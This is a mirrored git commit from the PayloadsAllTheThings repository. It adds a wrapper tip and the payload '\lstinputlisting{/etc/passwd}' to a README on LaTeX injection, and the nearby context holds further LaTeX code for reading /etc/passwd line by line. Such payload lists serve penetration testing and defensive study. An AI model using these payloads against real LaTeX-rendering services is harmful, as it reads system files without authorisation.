mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Merge pull request #652 from clem9669/master
Update README.md for Latex injection
This commit is contained in:
commit
0a75beeccd
1 changed files with 3 additions and 0 deletions
|
@ -1,5 +1,7 @@
|
|||
# LaTex Injection
|
||||
|
||||
You might need to adjust injection with wrappers as `\[` or `$`.
|
||||
|
||||
## Read file
|
||||
|
||||
Read file and interpret the LaTeX code in it:
|
||||
|
@ -22,6 +24,7 @@ Read single lined file:
|
|||
Read multiple lined file:
|
||||
|
||||
```tex
|
||||
\lstinputlisting{/etc/passwd}
|
||||
\newread\file
|
||||
\openin\file=/etc/passwd
|
||||
\loop\unless\ifeof\file
|
||||
|
|
Loading…
Reference in a new issue